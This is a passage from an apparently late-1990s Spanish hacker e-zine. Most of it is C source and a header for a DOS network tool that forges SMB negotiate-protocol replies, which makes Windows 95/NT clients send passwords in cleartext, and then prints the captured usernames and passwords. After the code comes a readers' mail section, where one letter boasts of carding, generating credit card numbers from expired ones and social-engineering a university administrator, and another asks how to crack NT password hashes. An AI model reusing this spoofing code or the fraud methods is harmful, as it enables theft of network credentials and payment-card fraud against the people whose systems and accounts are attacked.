XmitECB.FragCnt =3d 1;
XmitECB.NxtECB =3d (void far *) 0;
XmitECB.PreECB =3d (void far *) 0;
ECBData->version=3d0x45;
ECBData->type=3d0x00;
ECBData->length=3d0x6900; // Must byte-swap all words
ECBData->identification=3d0xEEEE; // Should be ignored since no
fragging
ECBData->flags1=3d0x0040;
ECBData->ttl=3d0x80;
ECBData->protocol=3d0x06;
ECBData->window=3d0x5221;
ECBData->dataOffset=3d0x50;
ECBData->flags2=3d0x18;
ECBData->pad1=3d0x00;
ECBData->nbtype=3d0x00;
ECBData->nbflags=3d0x00;
ECBData->nblength=3d0x4100;
// Setup the ECB data for a raw send. We're building the SMB packet to
spoof
// client into sending their password clear text on the wire. Most of the
// information was taken from an SMB client accessing our local SAMBA server
ECBData->x.RAW.buf[0]=3d0xff;
ECBData->x.RAW.buf[1]=3d0x53;
ECBData->x.RAW.buf[2]=3d0x4d;
ECBData->x.RAW.buf[3]=3d0x42;
ECBData->x.RAW.buf[4]=3d0x72;
ECBData->x.RAW.buf[5]=3d0x00;
ECBData->x.RAW.buf[6]=3d0x00;
ECBData->x.RAW.buf[7]=3d0x00;
ECBData->x.RAW.buf[8]=3d0x00;
ECBData->x.RAW.buf[9]=3d0x81;
ECBData->x.RAW.buf[10]=3d0x00;
ECBData->x.RAW.buf[11]=3d0x00;
ECBData->x.RAW.buf[12]=3d0x00;
ECBData->x.RAW.buf[13]=3d0x00;
ECBData->x.RAW.buf[14]=3d0x00;
ECBData->x.RAW.buf[15]=3d0x00;
ECBData->x.RAW.buf[16]=3d0x00;
ECBData->x.RAW.buf[17]=3d0x00;
ECBData->x.RAW.buf[18]=3d0x00;
ECBData->x.RAW.buf[19]=3d0x00;
ECBData->x.RAW.buf[20]=3d0x00;
ECBData->x.RAW.buf[21]=3d0x00;
ECBData->x.RAW.buf[22]=3d0x00;
ECBData->x.RAW.buf[23]=3d0x00;
// We need the Tree ID, Process ID, and Mux ID from the look ahead buffer
// since these fields change on every connection
//ECBData->x.RAW.buf[24]=3d0x00; Tree ID
//ECBData->x.RAW.buf[25]=3d0x00;
//ECBData->x.RAW.buf[26]=3d0xbf; Process ID
//ECBData->x.RAW.buf[27]=3d0x1b;
ECBData->x.RAW.buf[28]=3d0x00;
ECBData->x.RAW.buf[29]=3d0x00;
//ECBData->x.RAW.buf[30]=3d0x81; Mux ID
//ECBData->x.RAW.buf[31]=3d0x40;
ECBData->x.RAW.buf[32]=3d0x0D;
ECBData->x.RAW.buf[33]=3d0x02; // Dialect 2 for 95 ws, Dialect 5 for NT
ECBData->x.RAW.buf[34]=3d0x00;
ECBData->x.RAW.buf[35]=3d0x01;
ECBData->x.RAW.buf[36]=3d0x00;
ECBData->x.RAW.buf[37]=3d0x04;
ECBData->x.RAW.buf[38]=3d0x11;
ECBData->x.RAW.buf[39]=3d0x02;
ECBData->x.RAW.buf[40]=3d0x00;
ECBData->x.RAW.buf[41]=3d0x01;
ECBData->x.RAW.buf[42]=3d0x00;
ECBData->x.RAW.buf[43]=3d0x03;
ECBData->x.RAW.buf[44]=3d0x00;
ECBData->x.RAW.buf[45]=3d0xB0;
ECBData->x.RAW.buf[46]=3d0x8B;
ECBData->x.RAW.buf[47]=3d0xA1;
ECBData->x.RAW.buf[48]=3d0x00;
ECBData->x.RAW.buf[49]=3d0x2B;
ECBData->x.RAW.buf[50]=3d0x52;
ECBData->x.RAW.buf[51]=3d0x5C;
ECBData->x.RAW.buf[52]=3d0x22;
ECBData->x.RAW.buf[53]=3d0xA4;
ECBData->x.RAW.buf[54]=3d0x01;
ECBData->x.RAW.buf[55]=3d0x00;
ECBData->x.RAW.buf[56]=3d0x00;
ECBData->x.RAW.buf[57]=3d0x00;
ECBData->x.RAW.buf[58]=3d0x00;
ECBData->x.RAW.buf[59]=3d0x00;
ECBData->x.RAW.buf[60]=3d0x00;
ECBData->x.RAW.buf[61]=3d0x00;
ECBData->x.RAW.buf[62]=3d0x00;
ECBData->x.RAW.buf[63]=3d0x00;
ECBData->x.RAW.buf[64]=3d0x00;
ECBData->x.RAW.buf[65]=3d0x00;
ECBData->x.RAW.buf[66]=3d0x00;
ECBData->x.RAW.buf[67]=3d0x00;
ECBData->x.RAW.buf[68]=3d0x00;
ECBData->x.RAW.buf[69]=3d0x00;
ECBData->x.RAW.buf[70]=3d0x00;
ECBData->x.RAW.buf[71]=3d0x00;
ECBData->x.RAW.buf[72]=3d0x00;
ECBData->x.RAW.buf[73]=3d0x00;
ECBData->x.RAW.buf[74]=3d0x00;
ECBData->x.RAW.buf[75]=3d0x00;
ECBData->x.RAW.buf[76]=3d0x00;
ECBData->x.RAW.buf[77]=3d0x00;
ECBData->x.RAW.buf[78]=3d0x00;
ECBData->x.RAW.buf[79]=3d0x00;
ECBData->x.RAW.buf[80]=3d0x00;
ECBData->x.RAW.buf[81]=3d0x00;
ECBData->x.RAW.buf[82]=3d0x00;
ECBData->x.RAW.buf[83]=3d0x00;
ECBData->x.RAW.buf[84]=3d0x00;
ECBData->x.RAW.buf[85]=3d0x00;
ECBData->x.RAW.buf[86]=3d0x00;
ECBData->x.RAW.buf[87]=3d0x00;
ECBData->x.RAW.buf[88]=3d0x00;
ECBData->x.RAW.buf[89]=3d0x00;
ECBData->x.RAW.buf[90]=3d0x00;
ECBData->x.RAW.buf[91]=3d0x00;
ECBData->x.RAW.buf[92]=3d0x00;
ECBData->x.RAW.buf[93]=3d0x00;
ECBData->x.RAW.buf[94]=3d0x00;
ECBData->x.RAW.buf[95]=3d0x00;
ECBData->x.RAW.buf[96]=3d0x00;
ECBData->x.RAW.buf[97]=3d0x00;
ECBData->x.RAW.buf[98]=3d0x00;
ECBData->x.RAW.buf[99]=3d0x00;
ECBData->x.RAW.buf[100]=3d0x00;
ECBData->x.RAW.buf[101]=3d0x00;
ECBData->x.RAW.buf[102]=3d0x00; //last byte
ECBData->x.RAW.buf[103]=3d0x01;
// Setup some of the variables that we'll use later
foundpw=3d0;
sendOK=3d0;
wstype=3d0;
do
{
do
{
// Loop until someone hits a key or until we have a packet to
process
if(kbhit())
{
printf("C2MyAzz: Exiting\n");
uninit();
exit(0);
}
} while (CurEntry =3d=3d 0); //Loop until we get a packet
// Grab data out of packet to determine whether or not to proceed
type =3d (u8) (((IPpac *)(Data[0].data))->x.SMB.FunctionCode);
commandresp =3d (u8) (((IPpac *)(Data[0].data))->x.USERPWNT.cmdresp);
// NT and 95 use different username / password combinations. Check
// to see if the client is a 95 or NT workstation. Note that we're checking
// to see if the workstation supports long filenames (0x3 =3d NT), or DOS
// 8.3 only (0x0 =3d 95). This is an assumption based on observation. We
// could use additional information in the packet to determine NT or 95..
if((((IPpac *)(Data[0].data))->x.SMB.Flags2) =3d=3d 0x3)
wstype=3d1; // Looks like an NT Workstation
else
wstype=3d0; // Otherwise, a Windows 95 machine
// If this is a SMB NEG PROT and this is a request, grab information
// for the transmit ECB
if((type =3d=3d 0x72) && (!(commandresp & 0x80)))
{
SourceAddress=3d(u32)(((IPpac *)(Data[0].data))->srcaddr);
DestAddress=3d(u32)(((IPpac *)(Data[0].data))->destaddr);
sourcePort=3d(u16)(((IPpac *)(Data[0].data))->srcport);
destPort=3d(u16)(((IPpac *)(Data[0].data))->destport);
seqNum=3d(u32)(((IPpac *)(Data[0].data))->seqnumber);
ackNum=3d(u32)(((IPpac *)(Data[0].data))->acknumber);
MuxID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.muxId);
TreeID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.TreeID);
ProcID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.ProcessID);
pktlen =3d (u16) (((IPpac *)(Data[0].data))->length);
memmove(&pid, &Data[0].pid, sizeof(PID));
memmove(&immAddr, &Data[0].immAddr, sizeof(immAddr));
memmove(XmitECB.ImmAddr, (void *) immAddr, 6);
memmove(&XmitECB.ProtocolID, &pid, sizeof(PID));
*((u32 *)(&(ECBData->destaddr)))=3dSourceAddress;
*((u32 *)(&(ECBData->srcaddr)))=3dDestAddress;
*((u16 *)(&(ECBData->destport)))=3dsourcePort;
*((u16 *)(&(ECBData->srcport)))=3ddestPort;
*((u32 *)(&(ECBData->seqnumber)))=3dackNum;
*((u16 *)(&(ECBData->x.RAW.buf[24])))=3dTreeID;
*((u16 *)(&(ECBData->x.RAW.buf[26])))=3dProcID;
*((u16 *)(&(ECBData->x.RAW.buf[30])))=3dMuxID;
if(wstype =3d=3d 1)
ECBData->x.RAW.buf[33]=3d0x05; //NT Workstation uses dialect 5
else
ECBData->x.RAW.buf[33]=3d0x02; //95 Workstation uses dialect 2
// Need to calculate the IP and TCP headers. Start by setting up for
// grabbing the sequence numbers of the previous packets, and ca
seqNum=3dflipbyte32(seqNum);
pktlen=3dflipbyte16(pktlen);
// Ack number is last packet + data - header
nextseqNum=3d(seqNum + pktlen - 40);
nextseqNum=3dflipbyte32(nextseqNum);
*((u32 *)(&(ECBData->acknumber)))=3dnextseqNum;
seqNum=3dflipbyte32(seqNum);
pktlen=3dflipbyte16(pktlen);
// Calculate the IP and TCP checksums
// Initially set the CRCs to zero
ECBData->headerCRC=3d0x0000;
ECBData->tcpCRC=3d0x0000;
sum=3d0;
// Start by adding up all the bytes in IP header
ptr=3d(u16 *)ECBData;
for(j=3d0;j<10;j++)
sum+=3d(ptr[j]);
// Add any overflow into the sum
sum=3d(sum>>16)+(sum & 0xffff);
sum+=3d(sum>>16);
// Take 1's complement
ECBData->headerCRC=3d~sum;
// Calculate the TCP Checksum
// Note that we need to first create a pseudo-header for
// use in the TCP checksum. For more information, see page
// 186 of "Internetworking with TCP/IP" by Comer
sum=3d0; // Clear sum from last calculation
sum+=3dptr[6]; // Add up the IP address
sum+=3dptr[7];
sum+=3dptr[8];
sum+=3dptr[9];
sum+=3d0x0600; // Add in the protocol ID for TCP in IP
sum+=3d0x5400; // Add in the length of TCP data
for(j=3d10;j<74;j++) // Add up the bytes in the ECB
sum+=3d(ptr[j]);
// Add any overflow into the sum
sum=3d(sum>>16)+(sum & 0xffff);
sum+=3d(sum>>16);
// Take 1's complement
ECBData->tcpCRC=3d~sum;
if((foundpw =3d=3d 0) && (sendOK =3d=3d 0))
{
// SendOK is reset after the packet is sent
sendOK=3d1;
// Pass the ECB to LSL for a raw send
_asm
{
push es
push ds
mov ax, SEG XmitECB
mov es, ax ;Whew! Lots of work just to get
mov si, OFFSET XmitECB ;a packet on the wire.
mov bx, 0ch ;Let's transmit this tiresome
hag
call far ptr LSLProtocolSupportEntryPt
mov ComCode, ax
pop ds
pop es
}
}
else
foundpw=3d0;
} // End of packet send routine
// If we've received the client's password, display it on the screen
if(type =3d=3d 0x73)
{
memmove(password, ((IPpac*)(Data[0].data))->x.USERPWNT.password, 32);
memmove(username, ((IPpac*)(Data[0].data))->x.USERPW95.username, 15);
pwlen =3d (u8) (((IPpac *)(Data[0].data))->x.USERPWNT.pwlength);
// Since the password could be null, check to see if it appears
// to be a valid password. Is the first character of the password
// a valid ASCII character?
if((password[0] >=3d 0x21) && (password[0] <=3d 0x5D))
{
// If we spoof every packet, we won't connect to IPC to find the
// shares of the domain. By spoofing every other packet, we'll let
// the connection go through after a retry. This approach will
// present the user with an error screen after attempting to connect
// to the doamin, but if the user retries, we'll backoff and let
// the user through
foundpw=3d1;
if(wstype =3d=3d 1)
printf("User %s password is %s\n",&password[strlen(password)+1],
password);
else
{
// Need to null terminate the strings
password[23]=3d0x00;
username[15]=3d0x00;
printf("User %s password is %s\n", username, password);
}
}
} // End of password display routine
// Now that we've processed the packet, clear the buffer of the processed
// packet. Note that we're disabling interrupts because we might
// get stomped with a new packet while we're clearing out the old packet
_disable();
memmove(Data, &Data[1],(sizeof(Data) - sizeof(IPInfo)));
CurEntry--;
_enable();
} while (1);
}
------------ FIN -------------------------------------------------------------
Ahora te pongo el .h
------------ Codigo Fuente ---------------------------------------------------
//
//
//
#define flipbyte32( x ) ((u32) \
((((u32)(x) & 0x000000FFL) << 24) | \
(((u32)(x) & 0x0000FF00L) << 8) | \
(((u32)(x) & 0x00FF0000L) >> 8) | \
(((u32)(x) & 0xFF000000L) >> 24)))
#define flipbyte16( x ) ((u16) \
((((u16)(x) & 0x00FF) << 8) | \
(((u16)(x) & 0xFF00) >> 8)))
typedef signed char s8;
typedef unsigned char u8;
typedef unsigned int u16;
typedef long unsigned int u32;
typedef struct
{ u32 lo;
u32 hi;
} u64;
typedef struct
{ u8 addr [8];
} Addr;
typedef struct
{ u8 ID[6];
} PID;
typedef u32 ProtocolNumber;
typedef enum
{ ODI_SUCCESS =3d 0,
ODI_OUT_OF_RESOURCES =3d -119,
ODI_NO_MORE_ITEMS =3d -122,
ODI_FAIL =3d -124
} ODIStat;
typedef enum
{ FIRST_MUST,
FIRST_NEXT,
LOAD_DEPENDS,
LAST_NEXT,
LAST_MUST,
} CHNPOS;
typedef struct
{
u8 version;
u8 type;
u16 length;
u16 identification;
u16 flags1;
u8 ttl;
u8 protocol;
u16 headerCRC;
u32 srcaddr;
u32 destaddr;
//Start TCP Header
u16 srcport;
u16 destport;
u32 seqnumber;
u32 acknumber;
u8 dataOffset;
u8 flags2;
u16 window;
u16 tcpCRC;
u16 pad1;
//Start NB Header
u8 nbtype;
u8 nbflags;
u16 nblength;
union
{
struct
{
u8 Reserved0;
u8 IDString[3];
u8 FunctionCode;
u8 Reserved1[4];
u8 Flags1;
u16 Flags2;
u8 Reserved2[12];
u16 TreeID;
u16 ProcessID;
u16 Reserved3;
u16 muxId;
} SMB;
struct
{
u8 buf[32];
} RAW;
struct
{
u8 reserved1[9];
u8 cmdresp;
u8 reserved[43];
u8 pwlength;
u8 reserved2;
u8 password[32];
}USERPWNT;
struct
{
u8 reserved1[9];
u8 cmdresp;
u8 reserved[43];
u8 pwlength;
u8 reserved2;
u8 password[24];
u8 username[16];
}USERPW95;
} x;
} IPpac;
// template for Info Block
typedef u32 Func;
typedef struct
{
void (_far * LSLAPI )();
void (_far * GSAPI )();
void (_far * MLIDAPI)();
} InfoBlock;
// template for info copied from IP packet
typedef struct
{
u8 immAddr[6];
u8 type;
u16 size;
PID pid;
char data[1500];
} IPInfo;
typedef struct ECBs
{
void _far * NxtECB;
void _far * PreECB;
u16 Status;
void (_far * ECBISR)();
u16 ProtocolNum;
u8 ProtocolID[6];
u16 BoardNum;
u8 ImmAddr[6];
u8 ECBDrvrWkSpace[4];
u16 ECBPrtclWkSpace[4];
u16 DataLen;
u16 FragCnt;
u8 _far * Frag1Addr;
u16 Frag1Len;
} EventCB;
typedef struct
{
u8 _far * MediaHdr; // 4
u8 _far * DataPtr; // 4
u16 DataLen; // 2
PID ProtocolID; // 6
u16 BoardNum; // 2
u16 DataSize; // 2
PID ImmAddr; // 6
u16 PacAttrib; // 2
u16 DestType; // 2
u16 StartOffset; // 2
u8 PriorityLvl; // 1
u8 Reserved; // 1
} LookAhead;
typedef struct RxChainNode
{
u32 nextlink; // 4
u16 boardnum; // 2
u16 position; // 2
void (_far _loadds * ISR)(); // 4
void (_far * ControlEntryPt)(); // 4
u16 StackID; // 2
u16 PacFilterMsk; // 2
u32 Reserved; // 4
} RxNode; // 24 total
typedef struct
{
u8 cmajver;
u8 cminver;
u32 longname;
u32 shortname;
u8 pmajver;
u8 pminver;
u8 reserved[16];
} configtbl;
typedef struct
{
u8 majver;
u8 minver;
u16 ctr;
u32 mask;
u32 txpac;
u32 rxpac;
u32 nopac;
u16 cusctr;
} stattbl;
------------ FIN -------------------------------------------------------------
Bueno os dejo, por hoy, si por alguna casualidad un dia me apetece,
mandare otro texto del nbtstat, explicandolo que protocolos hay que
tener instalados, etc.
ad10.
P.D. Por problemas tecnicos hemos tenido que quitar la pagina, por lo
cual estamos buscando nuevo server, aunque seguro que cogamos un dominio
propio. Ya que para septiembre cambianos totalmente la pagina.
{CyBoRg} -thPrOpHeT-
SHG Security Group
<------>
[ Lastima lo del web y esperamos oir de vosotros pronto y a ver si te
animas y nos escribes algo ;-) ]
<---------------------------------------------------------------------------->
From: "Angel" <r9r99@xxxxxxxxxxxxxx>
Subject: Hola
Estoy realizando un proyecto sobre virus que explicara
como funcionan, con todo detalle en todas las plataformas
existentes,
os agradeceria cualquier tipo de informacion al respecto (en
español), si teneis algo, sea lo que sea, por favor mandarmelo a:
r9r99@xxxxxxxxxxxxxx
Muchas gracias. En cuanto lo tenga terminado os lo enviare
por si quereis publicarlo.
<------>
[ Pasate por nuestra seccion de VIRUS, que te sera muy util, y ya sabes
estamos esperando tu articulo de virus. ]
<---------------------------------------------------------------------------->
From: Usuari Escombra <ko@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: quiero colaborar
Holas... me encanta vuestro e-zine... especialmete el 3 y el 4...
porque el 1 es... como lo diriamos... un poco verde... pero de buen
rollo..!
Os escribo desde Barcelona.. (Spain) jajaja... pq aqui el tema esta muy
candente... mi seudonimo es NoFace aunque este es nuevo ya que antes yo
me hacia llamr NEXUS... sip uno de tantos pero quizas uno de los
primeros... Tengo alguna experiencia en hackear sistemas Unix...
y soy especialista en MACINTOSH... en eso no hay quien me gane aunque no
pude superar el reto de Apple para hackear su pagina... me preguntaba si
podria formar parte en la revista... Ah.. domino bastante de Carding
algo me he sacado con las Visas y poseo el secreto de generar numeros
con PELAS a partir de algun numero ya caducado.. me lo ensenyo un
coleguilla que controla mucho... Me ofrezco a redactar todo tipo de
articulos... de tema que sea escepto de Telefonia que poseo un
conocmiento limitado...
Opino que el Hack es uan forma de vida y como no una forma de pensar...
Gracias y espero que me escribais. Diciendome si colaboro o no..? OK
Venga animo y seguid asi que soys cojonudos e id con cuidado... EL GRAN
HERMANO OS OBSERVA jejeje.. bueno os escribo desde la universidad POMPEU
FABRA.. jeje infiltrado... jejej.... A ver si no me pillan un dia de
estos... una vez me pillaron Intentando hackaer el server central... y
me quede con el admin... jeje INGENIERIA SOCIAL...
- no, mi crnet.. mmmm me lo he dejado en casa...
_ no puedes estar aqui sin carnet... por cierto que haces.. ??
_ Nada... nada...
_ Fuera..
_ y tu quien eres...??
_ el admin..
(cara de superioridad)
_ A si? pues ensenyame el carnet ... (jejeje)
_ ahora voy a buscarlo... pa chulo yo...
(NoFace desaparece.. jejeje) anda buscame
Bueno SALUDOS....... HACK THE WORLD IS FUCK THE WORLD
XnexusX@xxxxxxxxxxxxxx <---- Ismael del servidor.. jejeervidor.. jeje
<------>
[ Pues los mienbros de la revista son los componentes de - J.J.F. / HACKERS
TEAM - y es un grupo cerrado. Pero por supuesto puedes escribir lo que
quieras que nosotros te lo ponemos encantados :) ]
<---------------------------------------------------------------------------->
From: Manuel-el oso <sambam@xxxxxxxxxxxxxx>
To: sambam@xxxxxxxxxxxxxx
Subject: el indio piel roja....
La historia nos recuerda que en cierta ocasion el
presidente de los Estados Unidos intento comprar
el territorio ocupado por los indios. Para ello le hizo
una proposicion al jefe indio "toro sentado".
Y esta fue su respuesta:
*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^
CARTA DEL JEFE INDIO
®Como se puede comprar o vender el firmamento, ni aun el calor de la
tierra?. Dicha idea nos es desconocida. Si no somos dueños de la frescura
del aire ni del fulgor de las aguas ®Como podrian ustedes comprarlos? Cada
parcela de esta tierra es sagrada para mi pueblo. Cada brillante mata de
pino, cada grano de arena de las playas, cada gota de rocio en los oscuros
bosques, cada altozano y hasta el sonido de cada insecto es sagrado a la
memoria y al pasado de mi pueblo. La savia que circula por las venas de los
robles lleva consigo las memorias de los pieles rojas.
Los muertos del hombre blanco olvidan su pais de origen cuando
emprenden sus paseos por las estrellas; en cambio, nuestros muertos nunca
pueden olvidar esa bondadosa tierra, puesto que es la madre de los pieles
rojas. Somos parte de la tierra y asi mismo, ella es parte de nosotros. Las
flores perfumadas son nuestras hermanas; el venado, el caballo, la gran
guila; estos son nuestros hermanos. Las escarpadas peñas, los humedos
prados, el calor del cuerpo del caballo y el hombre, todos pertenecemos a
la misma familia.
Por todo ello cuando el Gran Jefe de Washington nos envia el mensaje
de que quiere comprar nuestras tierras dice que nos reservar un lugar en el
que podamos vivir confortablemente entre nosotros. El se convertir en
nuestro padre y nosotros en sus hijos. Por ello consideramos su oferta de
comprar nuestras tierras. Ello no es facil, ya que esta tierra es sagrada
para nosotros.
El agua cristalina que corre por los rios y arroyuelos no es
solamente agua, sino, tambien, representa la sangre de nuestros antepasados.
Si le vendemos nuestra tierra deben recordar que es sagrada y a la vez
deben enseñar a sus hijos que es sagrada y cada reflejo fantasmagorico en
las claras aguas de los lagos cuenta los sucesos y memorias de las vidas
de nuestras gentes. El murmullo del agua es la voz del padre de mi padre.
Los rios son nuestros hermanos y sacian nuestra sed; son portadores de
nuestras canoas y alimentan a nuestros hijos. Si les vendemos nuestras
tierras, ustedes deben recordar y enseñarles a sus hijos que los rios son
nuestros hermanos y tambien lo son suyos y, por lo tanto, deben tratarlos
con la misma dulzura con la que se trata a un hermano. Sabemos que el
hombre blanco no comprende nuestro modo de vida. El no sabe distinguir
entre un pedazo de tierra y otro, ya que es un extraño que llega de noche y
toma de la tierra lo que necesita.
La tierra no es su hermana, sino su enemiga, y una vez conquistada
sigue su camino, dejando atras la tumba de sus padres sin importarle. Le
secuestra la tierra a sus hijos. Tampoco le importa, tanto la tumba de sus
padres como el patrimonio de sus hijos son olvidados. Trata a su madre, la
tierra, y a su hermano, el firmamento, como objetos que se compran, se
explotan y se venden como ovejas o piedras de colores. Su apetito devorar
la tierra, dejando atras solo un desierto.
No se, pero nuestro modo de vida es diferente al de ustedes. La sola
visita de sus ciudades apenan los ojos del piel roja. Pero quiza sea por
que el piel roja es un salvaje y no comprende nada.
No existe un lugar tranquilo en las ciudades del hombre blanco, ni
hay sitio donde escuchar como se abren las hojas de los arboles en primavera
o como aletean los insectos. Pero quiza tambien esto debe ser porque soy
un salvaje que no comprende nada. El ruido solo parece insultar nuestros
oidos. Y despues de todo, ®para que sirve la vida si el hombre no puede
escuchar el grito solitario del chotacabras ni las discusiones nocturnas de
las ranas al borde de un estanque?. Soy un piel roja y nada entiendo.
Nosotros preferimos el suave susurro del viento sobre la superficie de
un estanque, asi como el olor de ese mismo viento purificado por la lluvia
del mediodia o perfumado con aromas de pinos. El aire tiene un valor
inestimable para el piel roja, ya que todos los seres comparten un mismo
aliento, la bestia, el arbol, el hombre, todos respiramos el mismo aire. El
hombre blanco no parece consciente del aire que respira; como un moribundo
que agoniza durante muchos dias es insensible al olor. Pero si les vendemos
nuestras tierras, deben recordar que el aire nos es inestimable, que el
aire comparte su espiritu con la vida que sostiene. El viento que dio a
nuestros abuelos el primer soplo de vida tambien recibe sus ultimos
suspiros. Y si les vendemos nuestras tierras, ustedes deben conservarlas
como cosa aparte y sagrada, como un lugar donde hasta el hombre blanco
pueda saborear el viento perfumado por las flores de las praderas.
Por ello, consideramos su oferta de comprar nuestras tierras y si
decidimos aceptarla yo pondre una condicion: el hombre blanco debe tratar a
los animales de esta tierra como a sus hermanos. Soy un salvaje y no
comprendo otro modo de vida. He visto a miles de bufalos pudrirse en las
praderas, muertos a tiros por el hombre blanco desde un tren en marcha. Soy
un salvaje y no comprendo como una maquina humeante puede importar mas que
el bufalo, al que nosotros solo matamos para sobrevivir
®Que seria del hombre sin los animales? Si todos fueran exterminados,
el hombre moriria de una gran soledad espiritual; porque lo que suceda a
los animales tambien le sucedera al hombre, todo va enlazado. Deben
enseñarles a sus hijos que el suelo que pisan son las cenizas de nuestros
abuelos.Inculquen a sus hijos que la tierra esta enriquecida con las vidas
de nuestros semejantes a fin que sepan respetarla. Enseñen a sus hijos que
nosotros hemos enseñado a los nuestros que la tierra es nuestra madre; y
que todo lo que le ocurra a la tierra le ocurrira a los hijos de la tierra.
Si los hombres escupen en el suelo, se escupen a si mismos. Esto sabemos:
la tierra no pertenece al hombre; el hombre pertenece a la tierra. Esto
sabemos: todo va enlazado, como la sangre que une una familia. Todo va
enlazado.
El hombre no tejio la trama de la vida; el solo es un hijo. Lo que
hace con la trama se lo hace a si mismo. Ni siquiera el hombre blanco, cuyo
Dios pasea y habla con el de amigo a amigo, queda exento del destino comun.
Despues de todo quiza seamos hermanos. Ya veremos. Sabemos una cosa que
quiza el hombre blanco descubra algun dia: nuestro Dios es el mismo Dios.
Ustedes pueden pensar ahora que El les pertenece, lo mismo que desean que
nuestras tierras les pertenezcan, pero no es asi. El es el Dios de los
hombres y su compasion se comparte por igual entre el piel roja y el hombre
blanco. Esta tierra tiene un valor inestimable para El, y si se daña se
provocaria la ira del Creador.
Tambien los blancos se extinguiran, quiza antes que las demas tribus.
Contaminan sus lechos y una noche pereceran ahogados en sus propios
residuos. Pero ustedes caminaran hacia su destruccion rodeados de gloria,
inspirados por la fuerza de Dios que os trajo a esta tierra y que, por
algun designio especial, les dio dominio sobre ella y sobre el piel roja.
Ese destino es un misterio para nosotros, pues no entendemos por que se
exterminan los bufalos, se doman los caballos salvajes, se saturan los
rincones secretos de los bosques con el aliento de tantos hombres y se
atiborra el paisaje de las exuberantes colinas con cables parlantes. ®Donde
esta el matorral? Destruido.
®Donde esta el aguila? Desaparecio.Termina la vida y empieza la
supervivencia.
"Este mail esta echo con las ultimas neuronas de mi cerebro privilegiado, y
debo mantenerlas por lo que no se volvera a leer ni a corregir las faltas
ortograficas" Colaboracion por Pata.
*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^
<------>
[ hhhhuuumm interesante, pero, ® que es ? ]
<---------------------------------------------------------------------------->
From: "Tono" <cmaragon@xxxxxxxxxxxxxx>
Subject: Info
Me gustaria que me dijeseis las IP de la web de LEOWORLD ya que actualmente
esta con otra IP de la que vosotros habeis puesto.
Y tambien si vosotros haceis lo mismo qie me dijeseis las IP por las que
soleis poner vuestra web.
NOTA: si no cambiais la IP olvidad lo 2nd
vuestra pagina es la mejor que he encontrado en español , asi que no la
jodais, y lo que mas me ha gustado ha sido el simbolo "phi" de la seccion
de Crack.
Stop.....................
<------>
[ ®®® La IP de LEOWORLD ???, y nosotros no cambiamos y si lo hacemos no te
preocupes que te enteraras :) ]
<---------------------------------------------------------------------------->
From: default <default@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: hola desde el peru
Que tal amigos me parece que estan haciendo un buen trabajo pero diganme
como seria posible que yo pudiera adquirir un ejemplar
respuestas al
hepe@xxxxxxxxxxxxxx
<------>
[ Thx pero logicamente en nuestro web oficial y en nuestros distribuidores
oficiales. ]
<---------------------------------------------------------------------------->
From: "Juan Carlos" <j.tortola@xxxxxxxxxxxxxx>
Subject: ezine para Conde Vampiro y Mac Crack Bishop
Bueno tios el ezine es una pasada, desde luego estoy aprendiendo un huevo y
parte del otro. A pesar de que soy un newbie, tengo ganas de comenzar en
esto del mundo hack. Estoy realizando un generador de password aleatorio y
con diccionario para claves de NT 4. Estas estan encriptadas con hash MD4 y
necesito el codigo fuente de este algoritmo. Tambien necesito saber algo
mas de como atacar en condiciones las particiones NTFS por que los programas
PWdump y tal... Son un poco fuleros o por lo menos las versiones que yo
tengo, solo permiten ver los directorios inutiles donde no hay nada
interesante K:( Por cierto solo hablais de sistemas UNIX/LINUX, y muchos
servidores funcionan con la basurilla del Sr. Bill Gates. La verdad es que
no tengo mucha idea y creo que no puedo ofrecer una opinion real, sobre los
Bugs del NT. Pero a un asi lo tengo en casa y ultimamente casca bastante.
Me gustaria saber algunas cosas:
- Teneis una BBS hack por la zona centro...
- Que version de LINUX me recomendais.
- Teneis intercambio de correo sobre desarroyo de hw y sw para realizar :-)
Buneo no se se conseguire realizar algo guapo para el NT, de todas formas
segun avance os envio codigo fuente y algunas pruebas para que lo
publiqueis en el ezine, tengo intencion de adjuntar todos los programas
posibles para hakear el sistema virus NT.
A por cierto ya os he dicho que soy un newbie, pero tego ganas de ayudaros
y aprender, si necesitais algo sobre electronica, micros, etc... podeis
contactar conmigo.
<------>
[ Pues muchas gracias, ya sabemos que el ezine se a dedicado mucho a Unix,
pero eso no significa que no trabajemos con NT, mas adelante iremos
poniendo cosillas :)
Para pillar cosas buenas de NT, te recomendamos los siguientes urlÔs :
http://l0pht.com/
http://207.98.195.250/ (Rhino9)
http://www.ntshop.net
http://ciac.llnl.gov/ciac/ToolsUnixSig.html#Md4 Codigo del MD4
Por desgracia no contamos con BBS, sobre Linux depende lo que quieras
hacer y por el momento no tenemos mailing list pero estamos en ello.
Pues ya sabes envianoslo cuando lo tengas listo, tenemos ganas de verlo. ]
<---------------------------------------------------------------------------->
From: jaina7@xxxxxxxxxxxxxx (grieko)
To: jjf_team@usa.net
Subject: hola como estan
saben su page esta muy bien pero baje un archivo que decia
hackear page en español pero nada estaba en ingles
espero que pronto lo pongan en español
<------>
[ Pues eso a sido un descuido del webmaster y ese documento no sera
traducido por nosotros por lo que si alquien lo quiere traducir, pues ya
sabe. ]
<---------------------------------------------------------------------------->
From: c_plaza@xxxxxxxxxxxxxx
To: jjf_team@usa.net
Subject: informarles y agradecimiento
un saludo antes que nada y gracias por la informacion que brindan a todos
los cibernautas de este planeta.
me dirijo en la oprtunidad de avisarles que tengo una pagina en la cual he
utilizado fragmentos de sus composiciones asi como tambien les recomiendo a
las personas que visiten mi pagina, que para mayor informacion se dirijan a
la pagina de ustedes. mi pagina es
http://www.geocities.com/Heartland/Plains/3102
nota: espero que si esta en la posibilidad de ustedes me sirvan dar algunos
consejos.
att. Carlos Plaza
<------>
[ Okis :) ]
<---------------------------------------------------------------------------->
From: plaxius <plaxius@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: °°Proyecto_R !!
Hola estimados :
Un gustazo saludarlos de nuevo , y felicitarlos ya que el numero cuatro
